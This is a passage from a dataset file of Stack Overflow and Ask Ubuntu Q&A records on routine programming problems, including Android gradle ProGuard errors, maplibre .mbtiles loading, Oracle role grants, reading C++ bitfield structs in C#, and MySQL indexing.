USING static lib is supported NOW, for that case,\n \/\/ simple change:\n \/\/ SharedLibaryBinary --> StaticLibraryBinary\n \/\/ sharedLibraryFile --> staticLibraryFile\n \/\/ *.so --> *.a\n \/\/gperf {\n \/\/ headers.srcDir \"${lib_distribution_root}\/gperf\/include\"\n \/\/ binaries.withType(SharedLibraryBinary) {\n \/\/ sharedLibraryFile = file(\"${lib_distribution_root}\/gperf\/lib\/${targetPlatform.getName()}\/libgperf.so\")\n \/\/ }\n \/\/}\n }\n }\n android {\n compileSdkVersion = 25\n buildToolsVersion = '25.0.0'\n\n defaultConfig {\n applicationId='com.gfk.mediawatchapp'\n minSdkVersion.apiLevel = 17\n targetSdkVersion.apiLevel = 25\n versionCode = 22\n versionName = '255.0.4'\n \/\/ Enabling multidex support.\n \/\/multiDexEnabled true\n }\n ndk {\n platformVersion = 17\n moduleName = 'mwlib'\n toolchain = \"clang\"\n stl = 'gnustl_static'\n cppFlags.add('-std=c++11')\n ldLibs.addAll(['android', 'log', 'OpenSLES', 'atomic'])\n \/\/build a default combined apk including all ABIs.\n \/\/abiFilters.addAll(['armeabi-v7a'])\n abiFilters.addAll(['armeabi', 'armeabi-v7a', 'x86']) \/\/this is default\n }\n sources {\n main {\n jni {\n dependencies {\n library 'nativeaudio' linkage 'shared'\n library 'fpextractor' linkage 'shared'\n \/\/ if gperf were *.a, change shared --> static\n \/\/library 'gperf' linkage 'shared'\n }\n }\n jniLibs {\n \/\/ for shared lib, lib need to be pushed to the target too\n \/\/ Once libs are copied into app\/src\/main\/jniLibs directory,\n \/\/ Android Studio will pack them into APK's lib\/ directory\n \/\/ Here we like to avoid another duplication by pointing\n \/\/ to the files that containing our libs' distribution location\n \/\/ so the same file is used by compiler at host, also packed\n \/\/ into APk to be used at Target (phone\/tablet)\n source {\n srcDir \"${lib_distribution_root}\/nativeaudio\/lib\"\n srcDir \"${lib_distribution_root}\/fpextractor\/lib\"\n \/\/srcDir \"${lib_distribution_root}\/gperf\/lib\"\n }\n }\n }\n }\n buildTypes {\n release {\n minifyEnabled true\n shrinkResources true\n proguardFiles.add(file('proguard-android.txt'))\n proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'\n }\n }\n }\n}\n\ndependencies {\n println rootProject.getName()\n compile fileTree(include: ['*.jar'], dir: 'libs')\n compile 'com.android.support:support-v4:25.3.1'\n compile 'commons-net:commons-net:3.5'\n \/\/compile 'com.android.support:appcompat-v7:23.3.0'\n compile 'com.android.support:appcompat-v7:25.3.1'\n compile 'com.android.support:design:25.3.1'\n compile 'com.android.support:cardview-v7:25.3.1'\n compile 'com.android.support:recyclerview-v7:25.3.1'\n compile 'com.google.android.gms:play-services-appindexing:9.8.0'\n compile 'com.amazonaws:aws-android-sdk-core:2.4.2'\n compile 'com.amazonaws:aws-android-sdk-s3:2.4.2'\n compile 'com.amazonaws:aws-android-sdk-ddb:2.4.2'\n compile 'com.amazonaws:aws-android-sdk-cognitoidentityprovider:2.4.2'\n}\n\n\/\/ Unnecessary dependency management:\n\/\/ Make sure the libs are available when begin compiling application project\n\/\/ This could be ignored because in real scenario, the pre-built libs are\n\/\/ already given to us before creating application.\ntasks.whenTaskAdded { task ->\n if (task.name.contains('compile')) {\n task.dependsOn ':nativeaudio:distributeLib'\n task.dependsOn ':fpextractor:distributeLib'\n }\n}\n<\/code>\nPlease: Can anyone help me to understand why I have always the following error:\n\nNo signature of method:\n 
org.gradle.model.ModelMap.getDefaultProguardFile() is applicable for\n argument types: (java.lang.String) values: [proguard-android.txt]\nComment: have you tried a newer version of gradle build tools than 0.9.3?\nComment: the version 0.9.3 it the latest gradle-experimental. The build work fine if I set **minifyEnabled false** and comment out shrinkResources and proguardFiles. But as soon as I set **minifyEnabled true** the and uncoment the proguard file, the build fails\nComment: that's expected since you need proguard only for minify. Is there a reason you need experimental gradle ?\nComment: I use experimental gradle because I have to compile also native code (ndk) in my project.\nAnswer: Gradle experimental does not include getDefaultProguardFile() since it does not have any version of ProGuard config by default.\nYou can use move the lines from your <code>proguard-android.txt<\/code> to <code>proguard-rules.pro<\/code> and then change this line:\n<code>proguardFiles.add(file('proguard-android.txt'))\nproguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'\n<\/code>\ninto this:\n<code>proguardFiles.add(file('proguard-rules.pro'))\n<\/code>\nAnswer: For me adding a manifest with\n<code>jar {\n manifest {\n attributes 'Main-Class': com.package.to.main.Class\n }\n}\n<\/code>\nhelped.\nSee here: Creating runnable JAR with Gradle\n","meta":{"source":"stackoverflow","title":"build gradle fail with \"no signature of method .... is applicable for argument types: (java.lang.String) values\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plain Google Maps App - How can I resize the container?\n\nQuestion: Here's my ViewController implementation:\n<code> @implementation ViewController\n\n -\n (void) viewDidLoad {\n [super viewDidLoad];\n \/\/ Do any additional setup after loading the view, typically from a nib.\n }\n\n -\n (void) didReceiveMemoryWarning {\n [super didReceiveMemoryWarning];\n \/\/ Dispose of any resources that can be recreated.\n }\n\n -\n (void) loadView {\n \/\/ Create a GMSCameraPosition that tells the map to display the\n \/\/ coordinate -33.86,151.20 at zoom level 6.\n GMSCameraPosition * camera = [GMSCameraPosition cameraWithLatitude: -33.86\n longitude: 151.20\n zoom: 6\n ];\n GMSMapView * mapView = [GMSMapView mapWithFrame: CGRectZero camera: camera];\n mapView.myLocationEnabled = YES;\n self.view = mapView;\n\n \/\/ Creates a marker in the center of the map.\n GMSMarker * marker = [\n [GMSMarker alloc] init\n ];\n marker.position = CLLocationCoordinate2DMake(-33.86, 151.20);\n marker.title = @ \"Sydney\";\n marker.snippet = @ \"Australia\";\n marker.map = mapView;\n }\n\n @end\n<\/code>\nHow can I resize this window, because right now it spans all over the screen? I want it to be smaller so it fits into a smaller box below the status bar on top.\nAnswer: Create a UIView and add mapView as subview\n<code> UIView *yourView = [[UIView alloc] initWithFrame:CGRectMake(10, 64, 200, 200)];\n [self.view addSubview:yourView];\n<\/code>\nJust replace\n<code> GMSMapView * mapView = [GMSMapView mapWithFrame: CGRectZero camera: camera];\n<\/code>\nwith\n<code> GMSMapView * mapView = [GMSMapView mapWithFrame: yourView.bounds camera: camera];\n<\/code>\nalso replace\n<code>self.view = mapView;\n<\/code>\nwith\n<code>[yourView addSubview:mapView];\n<\/code>\nComment: For the last one, [testView addSubview:mapView];, my compiler said use of undeclared identifier \"testView\".\nComment: My mistake replace it with yourview\nComment: Thanks it has compiled. 
However, now its just a blank white screen (google maps not load).\nAnswer: Change this line :\n<code> self.view = mapView;\n<\/code>\nTo : \n<code>[self.view addSubview:mapView];\nmapView.frame = CGRectMake(0, 64,300, 300);\/\/ Set your Expected size here.\n<\/code>\n\nReason behind your issue is you are setting <code>mapView<\/code> as your main view\n so its taking mainView size and showing into fullscreen.\n\nHope this will help you to change your <code>mapView<\/code> size.\nComment: It says Undeclared Identifier \"addSubView\"\nComment: sorry typo mistake try `[self.view addSubview:mapView];`\n","meta":{"source":"stackoverflow","title":"Plain Google Maps App - How can I resize the container?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Render local .mbtiles from file in maplibre-react-native\n\nQuestion: I am wondering if it's possible to overlay a <code>mbtiles<\/code> file using a <code>VectorSource<\/code> and <code>FillLayer<\/code> using <code>maplibre-react-native<\/code>. Currently my setup works with a remotely hosted dataset, but not when using a .mbtiles file with a path from the documents filesystem path.\nI am using Expo workflow with the dev-client, so I'd be best if it could be done without touching native files.\n<code>const downloadMbtiles = async () => {\n const remoteUrl = 'my-url';\n const localPath = FileSystem.documentDirectory + 'test.mbtiles';\n const { status, uri } = await FileSystem.downloadAsync(remoteUrl, localPath);\n console.warn(status, uri); \/\/ 200 ok\n};\n\nreturn (\n <MapLibreGL.VectorSource\n key={'maps-overlay'}\n id={'maps-source'}\n url={FileSystem.documentDirectory + 'test.mbtiles'}\n >\n <MapLibreGL.FillLayer\n id={'test-overlay'}\n sourceLayerID={'test-123'}\n style={{\n fillOpacity: 0.8,\n fillColor: [\n 'interpolate',\n ['linear'],\n ['get', 'v'],\n 0,\n 'gold',\n 2,\n 'red',\n ],\n }}\n \/>\n <\/MapLibreGL.VectorSource>\n);\n\n<\/code>\nAnswer: To use a local <code>.mbtiles<\/code> file with <code>maplibre-react-native<\/code> in an Expo workflow without touching native code, you could try and serve the <code>.mbtiles<\/code> file over HTTP using a local server within your app.\nThat would involve using a library like <code>expo-server<\/code> (or any other suitable library) to serve files locally: start a local server, serve the <code>.mbtiles<\/code> file, and then use the local server's URL as the source URL in your <code>VectorSource<\/code>.\nI see an @expo\/server package, published a month ago (with a fairly recent changelog).\nTry instead mbtiles-server or the more recent <code>tileserver-gl<\/code> (<code>npm install -g tileserver-gl<\/code>).\nA <code>tileserver-gl path\/to\/your\/test.mbtiles<\/code> should start a local server, usually accessible at <code>http:\/\/localhost:8080<\/code>, serving tiles from your <code>.mbtiles<\/code> file. The console output will provide the exact URL.\nWith your tile server running, you will need to update your <code>maplibre-react-native<\/code> component to fetch tiles from your local <code>tileserver-gl<\/code> instance. 
Replace the <code>url<\/code> prop in the <code>VectorSource<\/code> component with the URL provided by <code>tileserver-gl<\/code>s:\n<code>const LOCAL_TILESERVER_URL = \"http:\/\/localhost:8080\/data\/v3\/{z}\/{x}\/{y}.pbf\";\n\nreturn (\n <MapLibreGL.VectorSource\n key={'maps-overlay'}\n id={'maps-source'}\n url={LOCAL_TILESERVER_URL} \/\/ Use the URL provided by tileserver-gl\n >\n <MapLibreGL.FillLayer\n id={'test-overlay'}\n sourceLayerID={'test-123'}\n style={{\n fillOpacity: 0.8,\n fillColor: [\n 'interpolate',\n ['linear'],\n ['get', 'v'],\n 0,\n 'gold',\n 2,\n 'red',\n ],\n }}\n \/>\n <\/MapLibreGL.VectorSource>\n);\n<\/code>\nSince <code>tileserver-gl<\/code> runs outside the Expo environment, there should be no compatibility issues. However, make sure your mobile device or simulator can access the local server. If testing on a physical device, your device and the server must be on the same network, and you may need to use your machine's IP address instead of <code>localhost<\/code>.\n\nIf I were to host a tiling server, I could better host my own and make this much easier. My idea is to do this locally without any servers. I thought it must be doable since there exists a <code>mbtiles:\/\/<\/code> protocol in the <code>gl-js<\/code> library.\n\nThat would mean a more integrated and seamless solution within the Expo and <code>maplibre-react-native<\/code> environment. Unfortunately, the <code>mbtiles:\/\/<\/code> protocol implementation in <code>maplibre-gl-js<\/code> is designed for direct access to <code>.mbtiles<\/code> files, which is not directly supported in a React Native (and by extension, Expo) environment due to the sandboxed nature of mobile app file systems and the React Native runtime.\nOne theoretical approach to achieve direct <code>.mbtiles<\/code> usage would be to develop a custom native module for React Native that implements <code>.mbtiles<\/code> file reading and tile serving functionality directly within the app. That module could expose a method to React Native that returns tile images given x, y, and z parameters, mimicking a tile server's response but locally.\nBut: that would require ejecting from Expo's managed workflow to add custom native code, which is what you wanted to avoid.\nAnother approach, not fully aligned with avoiding server setups, involves extracting the tiles from the <code>.mbtiles<\/code> file and bundling them with the app. That method, while also somewhat cumbersome, would allow for using the tiles directly from the filesystem. Tools like <code>mbutil<\/code> or custom scripts could automate the extraction process.\nThe main drawback is the significant increase in app size and the static nature of the tile data.\nHence, the first proposed approach, running a local server within the app (or using an embedded server that starts with the app) and accessing this server through a <code>WebView<\/code> component. It uses <code>tileserver-gl<\/code> or a similar tool, running it in a way that is encapsulated within the app's environment.\nWhile this still involves a server, it is local to the app and does not require external hosting.\nComment: Thanks for your detailed answer. This sounds like it could work, but is ofcourse a bit hacky. If I were to host a tiling server, I could better host my own and make this much easier. My idea is to do this local without any servers. 
I thought it must be doable since there exists a `mbtiles:\/\/` protocol in the `gl-js` library.\n","meta":{"source":"stackoverflow","title":"Render local .mbtiles from file in maplibre-react-native","dup_signals":{}},"subset":"stackexchange"} +{"text":"Could not grant roles permission in \"Run SQL Command Line\" powered by oracle 11g\n\nQuestion: I am trying to create a role in an Oracle 11g database using the SQL Command Line, but I am receiving errors related to insufficient privileges. Specifically, I am trying to grant the \"CREATE ANY ROLE\" privilege to the user account, but I am receiving an \"ORA-00911: invalid character\" error.\nSteps taken:\n\nCreated a new database on Oracle 11g with a user account named \"21F_9208\".\n\nConnected to the database using the SQL Command Line and verified that the user account can view tables in the database.\n\nAttempted to create a new role using the following SQL command:\n\nCREATE ROLE superadmin;\n\nReceived an error message indicating that the user did not have sufficient privileges to create a role.\n\nAttempted to grant the \"CREATE ANY ROLE\" privilege to the user account using the following SQL command:\n\nGRANT CREATE ANY ROLE TO 21F_9208;\n\nReceived an \"ORA-00911: invalid character\" error message.\n\nPotential solutions by CHAT GPT but I am beginner so that did not helped me out:\n\nVerify that the user account has the necessary permissions to create roles and grant privileges. This may involve checking the user's roles and privileges using the SQL Command Line or Oracle Enterprise Manager.\nCheck the syntax of the SQL commands to ensure that they are properly formatted and do not contain any typos or errors.\nContact Oracle support for assistance in resolving the issue, particularly if the user does not have the necessary permissions to perform the required tasks.\n\njust want to give permissions to the my oracle 11g database 21F_9208 so that I can execute this statement to complete my assignment:\nGRANT SELECT, INSERT, UPDATE, DELETE ON admin TO superadmin;\nThis is role which need to be given permission to do the following things on the admin table\nAnswer: Only privileged users (such as <code>SYS<\/code>, unless you created your own) can create new users.\nIt means that <code>SYS<\/code> first has to\n<code>grant create role to \"21F_9208\";\n<\/code>\n(by the way, that's poorly chosen username; why did you set it that way? Now you have to qualify it using double quotes every time, as its name starts with a number. That is reason for error you got: \"<code>ORA-00911: invalid character<\/code>\").\nThat user (<code>\"21F_9208\"<\/code>) - apparently - owns table named <code>admin<\/code> because you want to grant DML privileges (select, insert, ...) 
on it to newly created role, <code>superadmin<\/code>.\n\nHere's a walkthrough.\nCreating new user:\n<code>SQL> show user\nUSER is \"SYS\"\nSQL> select tablespace_name from dba_tablespaces;\n\nTABLESPACE_NAME\n------------------------------\nSYSTEM\nSYSAUX\nUNDOTBS1\nTEMP\nUSERS\n\nSQL> create user \"21F_9208\" identified by demo\n 2 default tablespace users\n 3 quota unlimited on users\n 4 temporary tablespace temp;\n\nUser created.\n<\/code>\nGranting basic privileges (just to make this example work):\n<code>SQL> grant create session, create table, create role to \"21F_9208\";\n\nGrant succeeded.\n<\/code>\nConnect as newly create user:\n<code>SQL> connect \"21F_9208\"\/demo@pdb1\nConnected.\n<\/code>\nCreate table:\n<code>SQL> create table admin (id number);\n\nTable created.\n<\/code>\nCreate role:\n<code>SQL> create role superadmin;\n\nRole created.\n<\/code>\nGrant privileges to role:\n<code>SQL> grant select, insert, update, delete on admin to superadmin;\n\nGrant succeeded.\n\nSQL>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Could not grant roles permission in \"Run SQL Command Line\" powered by oracle 11g","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails 5 - polymorphic with autosave not working\n\nQuestion: In my app, I have a Tag model in a polymorphic relationship with Annotation and Document.\nTag\n<code>belongs_to :tagable, :polymorphic => true<\/code>\nAnnotation\n<code>has_many :tags, :as => :tagable, dependent: :destroy, autosave: true<\/code>\nDocument\n<code>belongs_to :tagable, :polymorphic => true, autosave: true<\/code>\nYet autosave does not work. What am I doing wrong?\nComment: What do you mean by does not work? Do you get an error? Does the creation work? What about the destruction? Also can you share the code you're using to for this?\nComment: does not update\/save; what code would you need?\nComment: I'm thinking about the one you use to create objects.\nComment: I can't understand what you're doing and what you want to accomplish. Make sure you're reading these: http:\/\/stackoverflow.com\/questions\/5403372\/has-one-belongs-to-association-autosave-true-not-saving, http:\/\/stackoverflow.com\/questions\/11605120\/autosave-ignored-on-has-many-relation-what-am-i-missing and ofc https:\/\/github.com\/rails\/rails\/blob\/56b3849316b9c4cf4423ef8de30cbdc1b7e0f7af\/activerecord\/lib\/active_record\/autosave_association.rb#L95\nAnswer: Autosave is not causing the issue; this needs to be implemented using nested forms, <code>accepts_nested_attributes_for<\/code> with <code>reject_if<\/code>.\n","meta":{"source":"stackoverflow","title":"Rails 5 - polymorphic with autosave not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"command for opening android studio\n\nQuestion: I recently installed easystroke on my Ubuntu 14.04 LTS system. I want to add a shortcut stroke for the same. Can you guys tell me what command to use?\nlocation of android studio is\n<code>\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh\n<\/code>\nfor other apps like firefox i use\n<code> wmctrl -a Firefox || firefox\n<\/code>\nbut this does not work for android studio\nalso \n<code>xdg-open of \/home\/.... 
\n<\/code>\nopens the bash file in text editor instead of terminal..\nPls help me out guys\nAnswer: Try this:\n<code>xdotool type \"sh '\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh'\" ; xdotool key KP_Enter\n<\/code>\nif not work try this then:\n<code>wmctrl -a \"Android Studio\" || \"\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh\"\n<\/code>\nComment: sorry bt that didnt work :(\nComment: @ChrisAbyAntony check my edit\nComment: Had we really the same idea at the same time? =)\nComment: @A.B. It's really not my idea , I just use this http:\/\/www.timelessguru.com\/easystroke :)\nComment: yeah this works perfect but seems that A.B. posted it first\nComment: @ChrisAbyAntony Good don't matter\nAnswer: With this command:\n<code>wmctrl -a \"Android Studio\" || \"\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh\"\n<\/code>\nUse the full path with double quotes.\n\nfrom <code>man wmctrl<\/code>\n<code> -a <WIN>\n Switch to the desktop containing the window <WIN>, raise the window, and give it\n focus.\n\n <WIN> This argument specifies a window that is the target of an action. By default the\n argument is treated as if were a string, and windows are examined until one is\n found with a title the contains the specified string as a substring. The substring\n matching is done in a case insensitive manner. The -F option may be used to force\n exact, case sensitive title matching. The option -i may be used to interpret the\n window target as a numeric window identity instead of a string.\n<\/code>\nComment: for some weird reason it didn work at first . now it works like a charm.\n","meta":{"source":"askubuntu","title":"command for opening android studio","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fail Read Int64 value from binary file created by C++\n\nQuestion: I m developing a C# CE application to read data from binary files which created by C++ progam to do item validation.\nBelow is the coding of the C++ program..\n<code> \/\/ File Name: Ean2an.bin which is created by struct \n struct EAN2AN_TYPE \n {\n __int64 ean:40; \/\/ 5 bytes, up to 12 digits\n __int64 rec_no:24; \/\/ 3 bytes rec no in the c_ItemMaster File, up to 16 million records\n };\n\n \/\/ After bind data to struct, wil create the binary file\n bool CreateBin_EAN2AN_TYPE()\n {\n if(mn_RecordCount_EAN2AN_TYPE == 0) return false;\n\n FILE *binfile;\n\n qsort(mc_EAN2AN_TYPE, mn_RecordCount_EAN2AN_TYPE, sizeof(struct EAN2AN_TYPE), qsort_EAN2AN_TYPE);\n try\n {\n binfile = fopen(ms_Path_EAN2AN_TYPE, \"wb\");\n fwrite(&mc_EAN2AN_TYPE, sizeof(struct EAN2AN_TYPE), mn_RecordCount_EAN2AN_TYPE, binfile);\n }\n catch(Exception ^ex)\n {\n TaskProgramLibrary::Message::ERR(\"Create EAN2AN_TYPE.bin fail!\\r\\n \" + ex->Message);\n }\n finally\n {\n fclose(binfile);\n\n mdw_FileSize_EAN2AN_TYPE = FileSize(ms_Path_EAN2AN_TYPE);\n }\n\n return true;\n }\n<\/code>\nI tried to read the data by using binary read(based on position) and use bitconverter to convert to int64 or using Marshal.PtrToStructure, but the value return is incorrect. 
Then i tried to read 5 bytes instead of 8 bytes from the file, but the value return stil incorrect.\n<code>Below is the written C# coding\n \/\/Struct created in C#\n [StructLayout(LayoutKind.Sequential)]\n public struct EAN2AN_TYPE\n {\n [MarshalAs(UnmanagedType.I8)]\n public Int64 ean;\n [MarshalAs(UnmanagedType.I8)]\n public Int64 rec_no;\n } \n\n \/\/The ways i tried to read in C#\n \/\/1.Read Int64 by Binary \n private void ReadByBinary()\n {\n using (BinaryReader b = new BinaryReader(_fs))\n {\n while (b.PeekChar() != 0)\n {\n Int64 x = b.ReadInt64();\n Console.WriteLine(x.ToString());\n\n }\n }\n\n }\n\n \/\/2.Using Marshal to convert the Intptr to struct's field type\n private object ReadByMarshal(Type iType)\n {\n _oType = iType;\/\/ typeof(System.Int64);\n byte[] buffer = new byte[Marshal.SizeOf(_oType)];\n \/\/byte[] buffer = new byte[5];\n\n object oReturn = null;\n\n try\n {\n _fs.Read(buffer, 0, buffer.Length);\n\n GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);\n oReturn = Marshal.PtrToStructure(handle.AddrOfPinnedObject(), _oType);\n handle.Free();\n\n return oReturn;\n }\n catch (Exception ex)\n {\n throw ex;\n }\n }\n\n \/\/3. Use Binary and use bit converter to convert to Int64\n private void ReadByBinaryAndUseBitConverter()\n {\n using (BinaryReader b = new BinaryReader(_fs))\n {\n byte[] x = b.ReadBytes(8);\n Int64 y = BitConverter.ToInt64(x, 0);\n Console.WriteLine(y);\n\n byte[] x2 = b.ReadBytes(8);\n Int64 y2 = BitConverter.ToInt64(x2,0);\n Console.WriteLine(y2);\n }\n\n }\n\n \/\/4. Use Marshal and convert to struct\n public EAN2AN_TYPE GetStructValue()\n {\n\n byte[] buffer = new byte[Marshal.SizeOf(typeof(EAN2AN_TYPE)];\n\n EAN2AN_TYPE oReturn = new EAN2AN_TYPE();\n\n try\n {\n \/\/if (EOF) return null;\n\n _fs.Read(buffer, 0, buffer.Length);\n GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);\n IntPtr rawDataPtr = handle.AddrOfPinnedObject();\n\n oReturn = (EAN2AN_TYPE)Marshal.PtrToStructure(rawDataPtr, typeof(EAN2AN_TYPE));\n\n handle.Free();\n\n if (_fs.Position >= _fs.Length)\n Close();\n\n return oReturn;\n }\n catch (Exception ex)\n {\n throw ex;\n }\n }\n<\/code>\nEdit:Upload image for the binary file\n\nEdit:The first 8 bytes value read by C# program\n\nThe binary data shown by editor\n\nAnybody have any idea?\nThanks in advance \nComment: what value did you expect, and what incorrect value did you get? did you look at the file with a hex editor to see whether the file contains the correct value?\nComment: Take a look at my answer below. I have a variable called \"incoming\". Show us what the 8 bytes are of your *actual* data in that same format, and tell use what the `ean` and `rec-no` values you expect to get from those 8 bytes are.\nComment: A screen shot of a binary file opened in a text editor is of little to no use. You are trying to deserialize 8 bytes. Show us those 8 bytes, and just those 8, in the order they are in the file and preferrably in hexadecimal.\nAnswer: <code>ean<\/code> is defined as a 40-bit entity and <code>rec_no<\/code> is 24-bit, making the entire struct only 64 bits. Your definition of <code>EAN2AN_TYPE<\/code> is 128 bits, so there's obviously going to be a problem. I question the sanity of whoever wrote the initial code, but your job is to get it back and use it, so you play with what you're dealt.\nEDIT: Updated to use your specified data and take into account Ben's complaint\nHere are two ways to get the same result. 
One is a little easier to understand since it does the movement in steps, the other is faster and \"more correct\". I put your example EAN data into my input to verify the results.\n<code>public struct EAN2AN_TYPE\n{\n public long ean; \/\/ can hold 5 bytes\n public int rec_no; \/\/ can hold 3 bytes\n}\n\nbyte[] incoming = new byte[] { 0x6F, 0x5D, 0x7C, 0xBA, 0xE3, 0x06, 0x07, 0x08 };\n<\/code>\nMemory Copying:\n<code>using(var stream = new MemoryStream(incoming))\nusing (var reader = new BinaryReader(stream))\n{\n \/\/ I leave it to you to get to the data\n stream.Seek(0, SeekOrigin.Begin);\n\n \/\/ get the data, padded to where we need for endianness\n var ean_bytes = new byte[8];\n \/\/ read the first 5 bytes\n Buffer.BlockCopy(reader.ReadBytes(5), 0, ean_bytes, 0, 5);\n var rec_no_bytes = new byte[4];\n \/\/ read the last 3\n Buffer.BlockCopy(reader.ReadBytes(3), 0, rec_no_bytes, 0, 3);\n\n var ean2 = new EAN2AN_TYPE();\n\n \/\/ convert\n ean2.ean = BitConverter.ToInt64(ean_bytes, 0);\n ean2.rec_no = BitConverter.ToInt32(rec_no_bytes, 0);\n}\n<\/code>\nBit shifting:\n<code>using (var stream = new MemoryStream(incoming))\nusing (var reader = new BinaryReader(stream))\n{\n \/\/ I leave it to you to get to the data\n stream.Seek(0, SeekOrigin.Begin);\n\n \/\/ get the data\n var data = BitConverter.ToUInt64(reader.ReadBytes(8), 0);\n var ean2 = new EAN2AN_TYPE();\n\n \/\/ shift into our data\n ean2.ean = (long)(data & ~0xFFFFFF0000000000);\n ean2.rec_no = (int)(data >> 40);\n}\n<\/code>\nOf course you could make the <code>EAN2AN_TYPE<\/code> a class, feed it in 8 bytes, then have property accessors that do the shifting shenanigans for you as well. I'd do that if this has to be a 2-way thing (i.e. you need to put data into one of those structs to send back to the C app).\nComment: yuck yuck yuck. Bit shift operators are the right way to emulate bitfields in a language that doesn't have them.\nComment: @Ben: Agreed, though if you're new to programming, my first xample I think is a little more clear on what's actually happening (yes, perf is not as good and it generates garbage).\nAnswer: It could be a problem with the endianness (if that's a word) of the data. You'll get problems like this if the data was written on a big-endian system, and read as little-endian, or vice-versa.\nThe other problem is that the two fields are actually packed into one 64-bit value. You may need to read an Int64 and then use bit operations to extract the two fields. All of your code appears to be reading two Int64 values by various means.\nAnswer: Thanks for your reply..\nThe initial C++ code is written by vendor. I only can try understand by read the C++ code. As my understanding.. it just create binary file and write in the data.. \nI cant find any encoding\/convert part from code .. \nI tried to convert the 1st ean(978086288751) to byte[] manually by code.\nThe byte[] is 111 93 124 186 227 0 0 0 which is different for the result i get..\nI have tested ctacke suggested code. but i still not able to get the correct ean..\nBelow is the coding.. 
(i added in the filestream to read the binary file)\n<code> using (FileStream fileStream = File.OpenRead(_File))\n {\n MemoryStream memStream = new MemoryStream();\n memStream.SetLength(fileStream.Length);\n fileStream.Read(memStream.GetBuffer(), 0, (int)fileStream.Length);\n\n using (BinaryReader reader = new BinaryReader(memStream))\n {\n \/\/stream.SetLength(_fs); \n \/\/ I leave it to you to get to the data\n memStream.Seek(0, SeekOrigin.Begin);\n\n \/\/ get the data, padded to where we need for endianness\n byte[] ean_bytes = new byte[8];\n \/\/ if this is wrong - then change param 4 to '3' to align at the other end\n Buffer.BlockCopy(reader.ReadBytes(8), 0, ean_bytes, 0, 8);\n \/\/byte[] rec_no_bytes = new byte[4];\n\n byte[] rec_no_bytes = new byte[4];\n \/\/ if this is wrong - then change param 4 to '1' to align at the other end\n Buffer.BlockCopy(reader.ReadBytes(3), 0, rec_no_bytes, 0, 3);\n\n EAN2AN_TYPE ean2 = new EAN2AN_TYPE();\n\n \/\/ convert\n ean2.ean = BitConverter.ToInt64(ean_bytes, 0);\n ean2.rec_no = BitConverter.ToInt32(rec_no_bytes, 0);\n }\n\n }\n<\/code>\n\/\/Result\nread 5 bytes : 17 0 0 0 0 \nean : 17\n\/\/I changed to \n<code> var ean_bytes = new byte[8];\n Buffer.BlockCopy(reader.ReadBytes(8), 0, ean_bytes, 0, 8);\n<\/code>\nResult\nread 8 bytes :17 0 0 0 0 108 94 5\nean :386865365256241169\nSo sorry i m still a new user.. not able to post any attachment..\nHope you can understand from my interpretation.\nComment: This should be an update to the question, as it only adds clarity but doesn't provide an actual answer.\nComment: Show me the *exact* data you have in those 8 bytes and *exactly* what you're expecting for a result. Endianness might be at play, or the expectation might be that the data is in contiguous bytes, not stored as an actual numeric.\nComment: ya i m update my question.. and the result after i tried your suggest code. i still not able to get the correct ean =( am i miss anything in the coding?\nComment: Some of the exactly result read from the bin file: Ean No 978086288751\nRec No 162010\n \nEan No 497185017195\nRec No 196711\n \nEan No 200000035773\nRec No 421407\n \nEan No 71881353183\nRec No 517408\nI m not able to upload any file here and cant copy paste the binary file content here(due to a lot of \/0).. If you dun mind.. can i email you the bin file?\n","meta":{"source":"stackoverflow","title":"Fail Read Int64 value from binary file created by C++","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fields after \"ORDER BY\" or \"WHERE\" and index in MySQL\n\nQuestion: Do Fields after \"ORDER BY\" or \"WHERE\" might have index (PRIMARY, UNIQUE, INDEX) in mysql?\nConsider a table with the following columns:\n<code>ID | AddedDate | CatID | Title | Description | Status | Editor\n<\/code>\nIn these queries, are <code>ID<\/code>, <code>AddedDate<\/code> and <code>CatID<\/code> might have index?\n<code> SELECT * \n FROM table WHERE ID = $id\n\n SELECT * \n FROM table \nORDER BY ID\n\n SELECT * \n FROM table \nORDER BY AddedDate\n\n SELECT * \n FROM table \nORDER BY CatID\n<\/code>\nComment: You're gonna need to rephrase that, also give a query as an example case.\nComment: I've done what I can to restructure your question based on your update, but I still don't understand what you mean by \"might have index\".\nAnswer: You can order by any field. Please clarify our question if you want to know more \/ something else.\nYou might want to read <code>ORDER BY<\/code> optimization. 
There it says that fields with index might even improve the sorting as no extra has to be done (in the optimal case).\nUpdate:\nYes, you can add an index if you want (if this is what you mean, it is still not clear as OMG Ponies points out). In general it is to say that you should add an index to those fields that you often use in <code>WHERE<\/code> clauses. \nAnswer: As far as I know, there are three basic ways to order rows:\n\nIn-memory sort: Read all rows into memeory and sort them. Very fast.\nUsing sorted index: Read one row at a time, looking up the columns that are not in the index in the base table.\nFile sort: Build a sort order by reading a part of the table at a time. This is really slow.\n\nFor tables that fit in memory, MySQL will probably choose option 1. That means it won't use an index even if it's present. The index will just be overhead.\nBut indexes shine for bigger tables. If the table is too big for memory, MySQL can avoid the painful file sort and rely on the index.\nThese days, memory is plentiful, and tables almost always fit in memory. I would only add indexes for ordering after I saw a file sort happening.\nAnswer: One of the main benefits of having an index that it lets you select only that subset of rows you're interested in. The alternative to using an index is to do a \"full table scan\".\nUnless you have a \"where\" clause, you're not really going to get much benefit from having indexes.\n","meta":{"source":"stackoverflow","title":"Fields after \"ORDER BY\" or \"WHERE\" and index in MySQL","dup_signals":{}},"subset":"stackexchange"} +{"text":"WPF Converter and NotifyOnTargetUpdated exclusive in a binding?\n\nQuestion: I have a problem with a databinding in WPF.\nWhen I try to use a value converter and set the NotifyOnTargetUpdated=True property to True, I get an XamlParseException with the following 